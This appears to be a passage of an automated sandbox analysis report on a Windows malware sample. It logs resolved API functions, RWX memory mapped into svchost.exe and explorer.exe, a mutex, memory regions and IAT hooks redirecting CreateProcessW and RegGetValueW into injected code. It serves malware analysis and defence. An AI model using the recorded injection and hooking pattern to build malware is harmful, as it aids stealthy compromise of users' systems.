Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetLastError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ReadFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Thread32First, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Thread32Next, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CancelIo, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamRelease, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamWrite, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileOpenA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileCreateStreamA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIStreamSetFormat, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileExit, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileInit, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIMakeCompressedStream, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = AVIFileRelease, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsWow64Process, address_out = 0x7ff977ace960 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7ff976f9d610 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrRChrA, address_out = 0x7ff977374dd0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = wsprintfA, address_out = 0x7ff9757d2610 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyA, address_out = 0x7ff976f9b9e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7ff976f97dd0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7ff976f972e0 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrToIntExA, address_out = 0x7ff977374e70 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrChrA, address_out = 0x7ff977374cc0 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrTrimA, address_out = 0x7ff977374e80 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7ff976faec40 True 1
Fn
Get Address c:\windows\system32\psapi.dll function = EnumProcessModules, address_out = 0x7ff977821040 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIW, address_out = 0x7ff97736b260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetShellWindow, address_out = 0x7ff9757d4060 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetWindowThreadProcessId, address_out = 0x7ff9757c4040 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = RtlExitUserThread, address_out = 0x7ff977f39fa0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCreateKeyA, address_out = 0x7ff976fc6dc0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameW, address_out = 0x7ff976f9da40 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegSetValueExA, address_out = 0x7ff976f82680 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7ff976f97d70 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 758389732128 True 1
Fn
Map - process_name = c:\windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xb095520000 True 1
Fn
Map - process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x7490000 True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Computer Name - False 1
Fn
Get Computer Name result_out = LHNIWSJ True 2
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Get Time type = Ticks, time = 109515 True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1E24E139-E5BC-00C9-5F32-E93403862DA8} True 1
Fn
Process #12: explorer.exe
5731 16
»
Information Value
ID #12
File Name c:\windows\explorer.exe
Command Line C:\Windows\Explorer.EXE
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:28, Reason: Injection
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
»
Information Value
PID 0x834
Parent PID 0x664 (c:\windows\system32\userinit.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 960
0x B5C
0x B54
0x B38
0x B30
0x B0C
0x B08
0x B04
0x B00
0x AFC
0x AF8
0x AF4
0x AF0
0x AEC
0x AE8
0x ABC
0x 988
0x 984
0x 974
0x 96C
0x 968
0x 958
0x 950
0x 94C
0x 948
0x 944
0x 940
0x 93C
0x 938
0x 920
0x 91C
0x 918
0x 914
0x 910
0x 90C
0x 908
0x 904
0x 900
0x 8D4
0x 8CC
0x 8C8
0x 8C0
0x 8BC
0x 8B8
0x 8B0
0x 8AC
0x 8A8
0x 8A0
0x 89C
0x 898
0x 894
0x 890
0x 88C
0x 884
0x 880
0x 860
0x 85C
0x 850
0x 84C
0x 848
0x 844
0x 83C
0x 838
0x B40
0x B3C
0x B50
0x B64
0x B2C
0x B24
0x 954
0x 794
0x 700
0x 38C
0x 7B8
0x 8E8
0x 598
0x 784
0x 990
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x00000000000b0000 0x000b0000 0x000bffff Pagefile Backed Memory rw True False False -
private_0x00000000000c0000 0x000c0000 0x000c6fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000e3fff Pagefile Backed Memory r True False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory rw True False False -
pagefile_0x0000000000170000 0x00170000 0x00173fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000180000 0x00180000 0x00182fff Pagefile Backed Memory r True False False -
private_0x0000000000190000 0x00190000 0x00191fff Private Memory rw True False False -
locale.nls 0x001a0000 0x0025dfff Memory Mapped File r False False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory rw True False False -
2314.bin 0x00260000 0x00260fff Memory Mapped File r True True False
...
private_0x00000000002e0000 0x002e0000 0x002e6fff Private Memory rw True False False -
explorer.exe.mui 0x002f0000 0x002f7fff Memory Mapped File r False False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x00310fff Private Memory rw True False False -
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory rw True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000430000 0x00430000 0x00430fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory r True False False -
cversions.1.db 0x00460000 0x00463fff Memory Mapped File r True False False -
pagefile_0x0000000000470000 0x00470000 0x00470fff Pagefile Backed Memory rw True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory rw True False False -
pagefile_0x0000000000490000 0x00490000 0x00617fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000620000 0x00620000 0x007a0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007b0000 0x007b0000 0x01baffff Pagefile Backed Memory r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db 0x01bb0000 0x01bc2fff Memory Mapped File r True False False -
private_0x0000000001bd0000 0x01bd0000 0x01c4ffff Private Memory rw True False False -
{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db 0x01c50000 0x01c6bfff Memory Mapped File r True False False -
pagefile_0x0000000001c70000 0x01c70000 0x01c72fff Pagefile Backed Memory r True False False -
private_0x0000000001c80000 0x01c80000 0x01c8ffff Private Memory rw True False False -
sortdefault.nls 0x01c90000 0x01fc6fff Memory Mapped File r False False False -
private_0x0000000001fd0000 0x01fd0000 0x0204ffff Private Memory rw True False False -
private_0x0000000002050000 0x02050000 0x020cffff Private Memory rw True False False -
private_0x00000000020d0000 0x020d0000 0x0214ffff Private Memory rw True False False -
shell32.dll.mui 0x02150000 0x021b0fff Memory Mapped File r False False False -
pagefile_0x00000000021c0000 0x021c0000 0x021c2fff Pagefile Backed Memory r True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021f9fff Pagefile Backed Memory rw True False False -
kernelbase.dll.mui 0x02200000 0x022defff Memory Mapped File r False False False -
private_0x00000000022e0000 0x022e0000 0x0235ffff Private Memory rw True False False -
private_0x0000000002360000 0x02360000 0x023dffff Private Memory rw True False False -
private_0x00000000023e0000 0x023e0000 0x0245ffff Private Memory rw True False False -
pagefile_0x0000000002460000 0x02460000 0x02461fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002470000 0x02470000 0x02471fff Pagefile Backed Memory r True False False -
private_0x0000000002480000 0x02480000 0x0257ffff Private Memory rw True False False -
oleaccrc.dll 0x02580000 0x02581fff Memory Mapped File r False False False -
oleaccrc.dll.mui 0x02590000 0x02594fff Memory Mapped File r False False False -
pagefile_0x00000000025a0000 0x025a0000 0x02657fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002660000 0x02660000 0x02663fff Pagefile Backed Memory r True False False -
private_0x0000000002670000 0x02670000 0x0276ffff Private Memory rw True False False -
private_0x0000000002770000 0x02770000 0x02770fff Private Memory rw True False False -
staticcache.dat 0x02780000 0x037bffff Memory Mapped File r False False False -
private_0x00000000037c0000 0x037c0000 0x037c6fff Private Memory rw True False False -
private_0x00000000037d0000 0x037d0000 0x037d0fff Private Memory rw True False False -
private_0x00000000037e0000 0x037e0000 0x037e0fff Private Memory rw True False False -
private_0x00000000037f0000 0x037f0000 0x037f0fff Private Memory rw True False False -
private_0x0000000003800000 0x03800000 0x0387ffff Private Memory rw True False False -
private_0x0000000003880000 0x03880000 0x03881fff Private Memory rw True False False -
private_0x0000000003890000 0x03890000 0x03890fff Private Memory rw True False False -
private_0x00000000038a0000 0x038a0000 0x038a0fff Private Memory rw True False False -
private_0x00000000038b0000 0x038b0000 0x038b0fff Private Memory rw True False False -
pagefile_0x00000000038c0000 0x038c0000 0x038c2fff Pagefile Backed Memory r True False False -
cversions.1.db 0x038d0000 0x038d3fff Memory Mapped File r True False False -
private_0x00000000038e0000 0x038e0000 0x038e0fff Private Memory rw True False False -
pagefile_0x00000000038f0000 0x038f0000 0x038f0fff Pagefile Backed Memory rw True False False -
private_0x0000000003900000 0x03900000 0x03900fff Private Memory rw True False False -
pagefile_0x0000000003910000 0x03910000 0x03912fff Pagefile Backed Memory r True False False -
pagefile_0x0000000003920000 0x03920000 0x03958fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000003960000 0x03960000 0x03962fff Pagefile Backed Memory r True False False -
private_0x0000000003970000 0x03970000 0x03970fff Private Memory rw True False False -
private_0x0000000003980000 0x03980000 0x03980fff Private Memory rw True False False -
cversions.2.db 0x03990000 0x03993fff Memory Mapped File r True False False -
stobject.dll.mui 0x039a0000 0x039a1fff Memory Mapped File r False False False -
pagefile_0x00000000039b0000 0x039b0000 0x039b2fff Pagefile Backed Memory r True False False -
pagefile_0x00000000039c0000 0x039c0000 0x039c2fff Pagefile Backed Memory r True False False -
iconcache_idx.db 0x039d0000 0x039d1fff Memory Mapped File rw True False False -
counters.dat 0x039d0000 0x039d0fff Memory Mapped File rw True True False
...
imageres.dll.mui 0x039e0000 0x039e0fff Memory Mapped File r False False False -
pagefile_0x00000000039f0000 0x039f0000 0x039f2fff Pagefile Backed Memory r True False False -
private_0x0000000003a00000 0x03a00000 0x03a00fff Private Memory rw True False False -
private_0x0000000003a10000 0x03a10000 0x03a8ffff Private Memory rw True False False -
private_0x0000000003a90000 0x03a90000 0x03a90fff Private Memory rw True False False -
cversions.2.db 0x03aa0000 0x03aa3fff Memory Mapped File r True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db 0x03ab0000 0x03af2fff Memory Mapped File r True False False -
cversions.2.db 0x03b00000 0x03b03fff Memory Mapped File r True False False -
private_0x0000000003b10000 0x03b10000 0x03b10fff Private Memory rw True False False -
pagefile_0x0000000003b20000 0x03b20000 0x03b22fff Pagefile Backed Memory r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x03b30000 0x03bbafff Memory Mapped File r True False False -
propsys.dll.mui 0x03bc0000 0x03bd0fff Memory Mapped File r False False False -
private_0x0000000003be0000 0x03be0000 0x03c5ffff Private Memory rw True False False -
private_0x0000000003c60000 0x03c60000 0x03cdffff Private Memory rw True False False -
private_0x0000000003ce0000 0x03ce0000 0x03d5ffff Private Memory rw True False False -
private_0x0000000003d60000 0x03d60000 0x03ddffff Private Memory rw True False False -
pagefile_0x0000000003de0000 0x03de0000 0x042d1fff Pagefile Backed Memory rw True False False -
private_0x00000000042e0000 0x042e0000 0x0435ffff Private Memory rw True False False -
private_0x0000000004360000 0x04360000 0x0445ffff Private Memory rw True False False -
thumbcache_idx.db 0x04460000 0x04461fff Memory Mapped File rw True False False -
thumbcache_48.db 0x04470000 0x0456ffff Memory Mapped File rw True False False -
netmsg.dll 0x04570000 0x04570fff Memory Mapped File r False False False -
netmsg.dll.mui 0x04580000 0x045b1fff Memory Mapped File r False False False -
iconcache_idx.db 0x045c0000 0x045c1fff Memory Mapped File rw True False False -
pagefile_0x00000000045d0000 0x045d0000 0x045d1fff Pagefile Backed Memory r True False False -
private_0x00000000045e0000 0x045e0000 0x0465ffff Private Memory rw True False False -
iconcache_48.db 0x04660000 0x0475ffff Memory Mapped File rw True False False -
private_0x00000000047e0000 0x047e0000 0x0485ffff Private Memory rw True False False -
private_0x0000000004860000 0x04860000 0x048dffff Private Memory rw True False False -
private_0x00000000048e0000 0x048e0000 0x0495ffff Private Memory rw True False False -
private_0x0000000004960000 0x04960000 0x0515ffff Private Memory - True False False -
private_0x0000000005160000 0x05160000 0x051dffff Private Memory rw True False False -
pagefile_0x00000000051e0000 0x051e0000 0x051e2fff Pagefile Backed Memory r True False False -
inputswitch.dll.mui 0x051f0000 0x051f1fff Memory Mapped File r False False False -
private_0x0000000005200000 0x05200000 0x05200fff Private Memory rw True False False -
pagefile_0x0000000005210000 0x05210000 0x05212fff Pagefile Backed Memory r True False False -
private_0x0000000005220000 0x05220000 0x05228fff Private Memory rw True False False -
private_0x0000000005230000 0x05230000 0x05233fff Private Memory rw True False False -
private_0x0000000005240000 0x05240000 0x05240fff Private Memory rw True False False -
thumbcache_idx.db 0x05250000 0x05251fff Memory Mapped File rw True False False -
private_0x0000000005260000 0x05260000 0x05260fff Private Memory rw True False False -
private_0x0000000005270000 0x05270000 0x05278fff Private Memory rw True False False -
private_0x0000000005280000 0x05280000 0x0537ffff Private Memory rw True False False -
pagefile_0x0000000005380000 0x05380000 0x05382fff Pagefile Backed Memory r True False False -
private_0x0000000005390000 0x05390000 0x053d7fff Private Memory rw True False False -
private_0x00000000053e0000 0x053e0000 0x0545ffff Private Memory rw True False False -
private_0x0000000005460000 0x05460000 0x054a7fff Private Memory rw True False False -
private_0x00000000054b0000 0x054b0000 0x0552ffff Private Memory rw True False False -
private_0x0000000005530000 0x05530000 0x055affff Private Memory rw True False False -
private_0x00000000055b0000 0x055b0000 0x0562ffff Private Memory rw True False False -
private_0x0000000005630000 0x05630000 0x056affff Private Memory rw True False False -
private_0x00000000056b0000 0x056b0000 0x0572ffff Private Memory rw True False False -
private_0x0000000005730000 0x05730000 0x057affff Private Memory rw True False False -
private_0x00000000057b0000 0x057b0000 0x0582ffff Private Memory rw True False False -
private_0x0000000005830000 0x05830000 0x058affff Private Memory rw True False False -
private_0x00000000058b0000 0x058b0000 0x0592ffff Private Memory rw True False False -
private_0x0000000005930000 0x05930000 0x059affff Private Memory rw True False False -
pagefile_0x00000000059b0000 0x059b0000 0x059b1fff Pagefile Backed Memory r True False False -
private_0x00000000059c0000 0x059c0000 0x05a3ffff Private Memory rw True False False -
windows.storage.dll.mui 0x05a40000 0x05a47fff Memory Mapped File r False False False -
sndvolsso.dll.mui 0x05a50000 0x05a51fff Memory Mapped File r False False False -
private_0x0000000005a60000 0x05a60000 0x05a6dfff Private Memory rw True False False -
pagefile_0x0000000005a70000 0x05a70000 0x05a72fff Pagefile Backed Memory r True False False -
pagefile_0x0000000005a80000 0x05a80000 0x05a80fff Pagefile Backed Memory rw True False False -
{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db 0x05b80000 0x05b9cfff Memory Mapped File r True False False -
private_0x0000000005ba0000 0x05ba0000 0x05ba0fff Private Memory rw True False False -
private_0x0000000005bb0000 0x05bb0000 0x05daffff Private Memory rw True False False -
iconcache_48.db 0x05db0000 0x05eaffff Memory Mapped File rw True False False -
private_0x0000000005eb0000 0x05eb0000 0x05f2ffff Private Memory rw True False False -
private_0x0000000005f30000 0x05f30000 0x05faffff Private Memory rw True False False -
thumbcache_idx.db 0x05fb0000 0x05fb1fff Memory Mapped File rw True False False -
pagefile_0x0000000005fc0000 0x05fc0000 0x05fc1fff Pagefile Backed Memory r True False False -
pagefile_0x0000000006010000 0x06010000 0x06010fff Pagefile Backed Memory rw True False False -
private_0x0000000006020000 0x06020000 0x06020fff Private Memory rw True False False -
private_0x0000000006030000 0x06030000 0x060affff Private Memory rw True False False -
private_0x00000000060b0000 0x060b0000 0x0612ffff Private Memory rw True False False -
For performance reasons, the remaining 350 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
Code pagefile_0x0000000007490000:+0x28dce kernelbase.dll:ActivatorUpdateForIsRouterChanges+0x146 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 kernelbase.dll:ActivatorUpdateForIsRouterChanges+0x140 2 bytes -
...
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x1fe 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x1f8 2 bytes -
...
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x20c 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x206 2 bytes -
...
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x21a 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x214 2 bytes -
...
Code pagefile_0x0000000007490000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x3fa 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x3f4 2 bytes -
...
Code pagefile_0x0000000007490000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x408 8 bytes -
...
Code pagefile_0x0000000007490000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x402 2 bytes -
...
IAT pagefile_0x0000000007490000:+0x289b5 89. entry of cfgmgr32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 230. entry of user32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 240. entry of user32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 668. entry of shell32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 638. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 631. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 199. entry of advapi32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 185. entry of setupapi.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 174. entry of setupapi.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 261. entry of msctf.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 177. entry of shlwapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 133. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
...
IAT pagefile_0x0000000007490000:+0x289b5 134. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 41. entry of wldap32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of oleaut32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 220. entry of combase.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 517. entry of ole32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 550. entry of ole32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 85. entry of clbcatq.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 88. entry of clbcatq.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
...
IAT pagefile_0x0000000007490000:+0x289b5 79. entry of rpcrt4.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 789. entry of explorer.exe 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 808. entry of explorer.exe 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 134. entry of pnidui.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 142. entry of pnidui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
IAT pagefile_0x0000000007490000:+0x289b5 277. entry of authui.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
...
IAT pagefile_0x0000000007490000:+0x289b5 302. entry of authui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
...
